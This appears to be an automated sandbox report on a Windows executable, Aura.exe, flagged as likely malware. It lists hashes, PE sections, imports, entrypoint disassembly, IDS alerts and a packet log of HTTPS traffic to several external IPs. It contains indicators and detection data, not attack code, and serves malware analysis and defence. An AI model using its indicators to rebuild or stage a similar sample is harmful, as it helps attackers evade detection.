Preview:	regf9...9....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................}@!CHvLE........9..................i=:.8................................. .......0..hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........c...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.691899926708883
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Aura.exe
File size:	1'374'720 bytes
MD5:	777f258d5f2e3e78413027726b439fcc
SHA1:	483d6dd7641228fe0eec2a2ee3e5e86ad06ac189
SHA256:	0f0d6730745730414481cf9af3826a72776ed8b4daacd8a924b716f632652317
SHA512:	aeff3da308bb1dbf936ce56d6d46086f06a9789c57ad685e3c58f53cfd6d554fab409a8efd65fa919e986a604a8249093f723533d5c5ad47215472563d5ab38f
SSDEEP:	24576:TAi/c6dNtEWZ4B+UsxoxbzmXX1EibXhYk2SO1Ks6w1EibXhYk2SO1Ks6:90qNtnKB+UsxoxbzYFEE+k2HREE+k2H
TLSH:	4B55E17270C1D073FA81A5B23598E3B5146BF572DA2E0FC7E2B4E3789048AD117AA51F
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........................................@.......................................@.................................06..<..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46e682
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D09BB6 [Tue Mar 11 20:23:18 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d462aa757f68629e41b3df6e6d4c6a3c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F76A8EDBA3Ah
jmp 00007F76A8EDB8A9h
mov ecx, dword ptr [00496840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F76A8EDBA36h
test esi, ecx
jne 00007F76A8EDBA58h
call 00007F76A8EDBA61h
mov ecx, eax
cmp ecx, edi
jne 00007F76A8EDBA39h
mov ecx, BB40E64Fh
jmp 00007F76A8EDBA40h
test esi, ecx
jne 00007F76A8EDBA3Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00496840h], ecx
not ecx
pop edi
mov dword ptr [00496880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00493864h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00493824h]
xor dword ptr [ebp-04h], eax
call dword ptr [00493820h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [004938ACh]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00498490h
call dword ptr [00493884h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F76A8EE2585h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93630	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x99e00	0x4540
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0x435c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8fb28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8bf98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x937c0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x89ad0	0x89c00	0bd698a1f44cc91b018d0fe5240109ab	False	0.5286942774500908	data	7.09207256696417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8b000	0xa034	0xa200	383899a836f6650ba73e1556e24d0e62	False	0.4230806327160494	data	4.888147649186249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x96000	0x2c5c	0x1600	233e04c81724f6e0f553a5dbb15f0a09	False	0.4073153409090909	data	4.744840434225013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x99000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x9a000	0x435c	0x4400	b181df1a2af7bbd01ea74e454a21e7ba	False	0.7916475183823529	data	6.714823432652306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x9f000	0x58a00	0x58a00	58eb1e1ddb8da4607641c369fd1b119c	False	1.000333325987306	OpenPGP Public Key	7.999465753534081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xf8000	0x58a00	0x58a00	58eb1e1ddb8da4607641c369fd1b119c	False	1.000333325987306	OpenPGP Public Key	7.999465753534081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

ole32.dll

OleDraw

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-12T21:42:14.212882+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49712	149.154.167.99	443	TCP
2025-03-12T21:42:16.259138+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49716	104.21.16.1	443	TCP
2025-03-12T21:42:17.889204+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49717	104.21.16.1	443	TCP
2025-03-12T21:42:21.269526+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49725	104.21.16.1	443	TCP
2025-03-12T21:42:23.977890+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49727	104.21.16.1	443	TCP
2025-03-12T21:42:26.958833+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49728	104.21.16.1	443	TCP
2025-03-12T21:42:30.036933+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.16.1	443	TCP
2025-03-12T21:42:32.853666+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.16.1	443	TCP
2025-03-12T21:42:36.274635+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.16.1	443	TCP
2025-03-12T21:42:38.189687+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 21:42:12.378205061 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:12.378252029 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:12.378317118 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:12.383373022 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:12.383388042 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.212769985 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.212882042 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.227437973 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.227468014 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.227854967 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.274391890 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.309526920 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.356326103 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.846363068 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.846395016 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.846402884 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.846437931 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.846457005 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.846466064 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.846488953 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.846513987 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.849402905 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.849433899 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.849447012 CET	49712	443	192.168.2.4	149.154.167.99
Mar 12, 2025 21:42:14.849453926 CET	443	49712	149.154.167.99	192.168.2.4
Mar 12, 2025 21:42:14.894265890 CET	49716	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:14.894324064 CET	443	49716	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:14.894377947 CET	49716	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:14.894926071 CET	49716	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:14.894937038 CET	443	49716	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:16.259138107 CET	49716	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:16.260812998 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:16.260859966 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:16.261077881 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:16.261599064 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:16.261636019 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:17.889132977 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:17.889204025 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:17.892545938 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:17.892558098 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:17.892832041 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:17.900918961 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:17.900943995 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:17.901015043 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.689582109 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.690617085 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.690680981 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.690715075 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.697263956 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.697314978 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.697340012 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.697350025 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.697398901 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.697406054 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.743192911 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.743216038 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.779846907 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.779875994 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.779922962 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.779948950 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.780004025 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.835238934 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.835351944 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.835417032 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.836596966 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.836617947 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:18.836628914 CET	49717	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:18.836635113 CET	443	49717	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:19.524744034 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:19.524789095 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:19.524858952 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:19.525852919 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:19.525867939 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:21.269462109 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:21.269526005 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:21.288676023 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:21.288702011 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:21.289041996 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:21.303056002 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:21.303287029 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:21.303325891 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:21.303417921 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:21.303425074 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:22.058146000 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:22.058243990 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:22.058304071 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:22.058443069 CET	49725	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:22.058470011 CET	443	49725	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:22.209549904 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:22.209604979 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:22.209691048 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:22.209997892 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:22.210011959 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:23.977763891 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:23.977890015 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:23.979121923 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:23.979132891 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:23.979383945 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:23.980596066 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:23.980729103 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:23.980758905 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:24.906187057 CET	443	49727	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:24.906910896 CET	49727	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:25.217464924 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:25.217515945 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:25.217649937 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:25.218019009 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:25.218029976 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:26.958753109 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:26.958832979 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:26.960671902 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:26.960684061 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:26.960937977 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:26.962801933 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:26.962937117 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:26.962966919 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:26.963017941 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:26.963027954 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:27.922429085 CET	443	49728	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:27.922643900 CET	49728	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:28.408895016 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:28.408962011 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:28.409090042 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:28.409400940 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:28.409420967 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.036856890 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.036932945 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:30.038295031 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:30.038311005 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.038552046 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.041265965 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:30.041353941 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:30.041395903 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.687870979 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.687985897 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:30.688060999 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:30.688188076 CET	49731	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:30.688209057 CET	443	49731	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:31.187504053 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:31.187560081 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:31.187690973 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:31.188097954 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:31.188110113 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.853560925 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.853666067 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.855076075 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.855087042 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.855329037 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.856620073 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.857358932 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.857387066 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.857465029 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.857495070 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858302116 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.858340979 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858449936 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.858472109 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858583927 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.858597994 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858711958 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.858740091 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858741045 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.858753920 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858875036 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.858899117 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.858915091 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.859002113 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.859031916 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.859061956 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.859066010 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.859080076 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.859081030 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.859122992 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:32.859169960 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.859206915 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:32.859225035 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:34.903995991 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:34.904093981 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:34.904149055 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:34.904292107 CET	49732	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:34.904318094 CET	443	49732	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:34.925192118 CET	49733	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:34.925232887 CET	443	49733	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:34.925321102 CET	49733	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:34.925678015 CET	49733	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:34.925698996 CET	443	49733	104.21.16.1	192.168.2.4
Mar 12, 2025 21:42:36.274635077 CET	49733	443	192.168.2.4	104.21.16.1
Mar 12, 2025 21:42:36.573354006 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:36.573393106 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:36.573585987 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:36.573869944 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:36.573884010 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:38.189596891 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:38.189687014 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:38.191342115 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:38.191354990 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:38.191627026 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:38.193567038 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:38.193600893 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:38.193645000 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.018150091 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.034387112 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.034425974 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.034451962 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.034455061 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.034477949 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.034513950 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.041060925 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.041131973 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.041240931 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.041250944 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.041309118 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.047811031 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.047910929 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:39.047970057 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.048038960 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.048054934 CET	443	49734	104.21.48.1	192.168.2.4
